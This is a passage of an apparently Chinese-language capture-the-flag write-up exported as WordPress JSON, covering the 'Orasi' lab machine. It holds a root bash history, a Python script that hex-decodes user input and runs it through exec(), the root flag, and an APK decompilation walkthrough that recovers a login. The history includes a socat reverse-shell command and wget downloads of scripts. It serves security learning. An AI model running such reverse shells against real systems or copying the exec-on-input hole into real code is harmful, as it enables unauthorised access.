nobody:nogroup \/var\/ftp\/pub\nnano \/etc\/vsftpd.conf\nsudo systemctl restart vsftpd\nsudo systemctl status vsftpf\nsudo systemctl status vsftpd\nclear\ncd \/var\/\nls\ncd ftp\nls\ncd pub\nls\nwget 10.0.2.15:8000\/url\nls\nls -la\nchown www-data:www-data url\nls -la\nchown nobody:nogroup url\nclear\ncd\nclear\nls\ncd var\nls\ncd \/var\nls\ncd www\nls\ncd html\nls\nrm index.hmtl\nrm index.html\nclear\ns\nwget 10.0.2.15:8001\/server.py\nwget 10.0.2.15:8002\/server.py\nclear\nls\nls -la\ncd \ncd \/etc\/systemd\/system\/\nnano orasi.service\ncat orasi.service\nsystemctl enable orasi.service\nreboot\nexport TERM=xterm\nd\ncd\nls\nclear\nsudo apt-get purge ssh\nsudo apt-get remove ssh\nsudo apt-get purge openssh-server\nsudo apt-get remove openssh-server\nsudo apt-get autoremove openssh-server\nclear\nls\ncd \/var\/www\/html\nls\npython3 server.py\nreboot\nclear\nls\nls -la\nmkdir .\/cron\nls -la\nrm cron\nrm -rf dir\nclear\nmkdir .cron\ncd .cron\nwget raw.githubusercontent.com\/AL1ENUM\/cron-service\/main\/check.sh\nks\ncat check.sh \nsystem is-active orasi.service\nsystemctl is-active orasi.service\nnano check.sh\nsystem is-active orasi.service\nsystemctl is-active orasi.service\nclear\ncd\nnano \/etc\/crontab\n\/bin\/bash \/root\/.cron\/check.sh \n\/bin\/bash \/root\/.cron\/check.sh \nwhich bash\n\/usr\/bin\/bash \/root\/.cron\/check.sh \nnano \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh \nnano \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh \n\/usr\/bin\/bash \/root\/.cron\/check.sh \n\/usr\/bin\/bash \/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\nls -la\ncd .cron\nls\nchmod +x check.sh\ncd\nrm -rf cron\nclear\n\/usr\/bin\/bash \/root\/.cron\/check.sh\n\/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\n\/root\/.cron\/check.sh\n\/bin\/sh \/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\n\/bin\/sh \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nls\nls -la\ncd .cron\nls\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nnano check.sh\nnano check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nmv check.sh check\n\/bin\/bash \/root\/.cron\/check\nnano check.sh\nnano check\nrm check\nclear\nnano check\nchmod +x check\n.\/check\n\/bin\/bash check\n\/bin\/bash \/root\/.cron\/check\ncd\nnano \/etc\/crontab\n\/bin\/bash \/root\/.cron\/check\ncd .cron\nls -la\nchmod 600 check\n\/bin\/bash \/root\/.cron\/check\nls -la\nchmod +x check\nls -la\nchmod 700 check\nls -la\n\/bin\/bash \/root\/.cron\/check\ncd\nclear\nsudo \/etc\/init.d\/apache stop\nsudo \/etc\/init.d\/apache2 stop\nreboot\nclear\ncd \/var\/www\/html\nls\nnano server.py\nclear\nreboot\nclear\ncd \/var\/www\/html\nls\nnano index.html\nreboot\nclear\ncd \/etc\/systemd\/system\/\nls\ncat orasi.service\nnano orasi.service\nreboot\ncd \/var\/www\/html\nls\nclear\nmv server.py pyth0ns3rv3ros.py\nreboot\nwhich rbash\nexit\ncd\nls\necho "b1c17c79773c831cbb9109802059c6b5" > root.txt\nls -la\nchmod 600 root.txt\nls -la\ncat root.txt\nclear\nexit\nwhich socat\nshell\nzsh\nrbash\nsudo apt-get install socat\nclear\nls\nls\ncd \/home\nls\ncd kori\nls\nwget 10.0.2.15:8000\/jail.php\ncat jail.php\nphp jail.php "socat TCP:10.0.2.15:4444 EXEC:sh"\nnano jail.php\nphp jail.php "socat TCP:10.0.2.15:4444 EXEC:sh"\nclear\nls\nchown kori:kori jail.php\nphp jail.php "socat TCP:10.0.2.15:4444 EXEC:sh"\nsudo su kori\nsu kori\nclear\nls\nls -la\ncd\nclear\nnano \/etc\/sudo\nnano \/etc\/sudoers\nsu kori\nnano \/etc\/sudoers\nexit\nsu www-data\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nwhich php\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nclear\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nsu kori\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nclear\nsu kori\nsudo apt-get install openssh-server\nclear\nnano \/etc\/sudoers\nls\nclear\nnano \/etc\/sudoers\npip3 install base64\nclear\npip3 install re\npip3 install re\npip install re\nclear\npwd\nls\nwget 10.0.2.15:8000\/oras.py\nclear\nls\nls -la\nchmod 600 oras.py\nchmod 700 oras.py\nls -la\nls\nclear\nexit\nls\ncat root.txt\nclear\nexit\nreboot\n(remote) root@orasi:\/root# cat oras.py\nimport os\nimport base64\nimport re\nimport sys\n\nname = input(": ")\nname = bytes.fromhex(name).decode('utf-8')\nprint(exec(name))\n(remote) root@orasi:\/root# cat root.txt\nb1c17c79773c831cbb9109802059c6b5\n(remote) root@orasi:\/root# <\/code><\/pre>\n
linux\u4e0b\u64cd\u4f5capk<\/h2>\n
\u770b\u5e08\u5085\u4eec\u7684wp\u53d1\u73b0\u4f3c\u4e4e\u6709\u8fd9\u79cd\u65b9\u6cd5\u5728linux\u547d\u4ee4\u884c\u64cd\u4f5capk\uff1a<\/p>\n
\n
https:\/\/github.com\/AL1ENUM\/walkthroughs\/blob\/main\/orasi.md<\/a><\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ cp irida.apk irida.zip\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ unzip irida.zip\nArchive:  irida.zip\n  inflating: res\/color\/material_on_surface_disabled.xml  \n  inflating: res\/layout\/test_toolbar.xml  \n  inflating: res\/anim\/design_snackbar_in.xml  \n  --------------\n    inflating: res\/color\/design_icon_tint.xml  \n  inflating: res\/drawable\/abc_seekbar_tick_mark_material.xml  \n  inflating: classes.dex             \n extracting: res\/drawable-hdpi-v4\/notification_bg_normal.9.png  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ ll\ntotal 16120\n-rw-rw-r--  1 kali kali  326592 Jun 13 11:16 a\n-rw-rw-r--  1 kali kali    2256 Jan  1  1981 AndroidManifest.xml\n-rw-rw-r--  1 kali kali 7480816 Jan  1  1981 classes.dex\n-rw-rw-r--  1 kali kali 4083889 Jun 13 12:08 irida.apk\n-rw-rw-r--  1 kali kali 4083889 Jun 13 12:19 irida.zip\ndrwxrwxr-x  8 kali kali    4096 Jun 13 12:19 kotlin\ndrwxrwxr-x  3 kali kali    4096 Jun 13 12:19 META-INF\ndrwxrwxr-x 46 kali kali    4096 Jun 13 12:19 res\n-rw-rw-r--  1 kali kali  482544 Jan  1  1981 resources.arsc\n-rw-rw-r--  1 kali kali   16976 Feb  7  2021 url\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ d2j-dex2jar classes.dex\ndex2jar classes.dex -> .\/classes-dex2jar.jar\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ mkdir irida\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ procyon classes-dex2jar.jar -o .\/irida\n------------------<\/code><\/pre>\n
\u53d1\u73b0\u4f3c\u4e4e\u8fd8\u7528\u4e86kotlin<\/code>\u5199\u7684\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ grep -Pnir irida .\/irida\/                         \n.\/irida\/com\/alienum\/irida\/ui\/login\/LoggedInUserView.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:7:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:8:import com.alienum.irida.data.Result;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:11:import com.alienum.irida.data.LoginRepository;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginActivity.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginResult.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginFormState.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:7:import com.alienum.irida.data.LoginRepository;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:8:import com.alienum.irida.data.LoginDataSource;\n.\/irida\/com\/alienum\/irida\/data\/LoginRepository.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/LoginRepository.java:7:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:10:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:15:        if (s.equals("irida") && s2.equals(this.protector("1#2#3#4#5"))) {\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:17:                return new Result.Success<Object>(new LoggedInUser(UUID.randomUUID().toString(), "Irida Orasis"));\n.\/irida\/com\/alienum\/irida\/data\/Result.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/model\/LoggedInUser.java:5:package com.alienum.irida.data.model;\n.\/irida\/com\/alienum\/irida\/R.java:5:package com.alienum.irida;\n.\/irida\/com\/alienum\/irida\/R.java:2756:        public static final int Theme_Irida = 2131689884;\n.\/irida\/com\/alienum\/irida\/BuildConfig.java:5:package com.alienum.irida;\n.\/irida\/com\/alienum\/irida\/BuildConfig.java:9:    public static final String APPLICATION_ID = "com.alienum.irida";<\/code><\/pre>\n
\u540c\u6837\u53ef\u4ee5\u627e\u5230\u5bc6\u7801\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
Orasi \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19,22,18],"tags":[],"class_list":["post-869","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=869"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869\/revisions"}],"predecessor-version":[{"id":870,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869\/revisions\/870"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=869"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}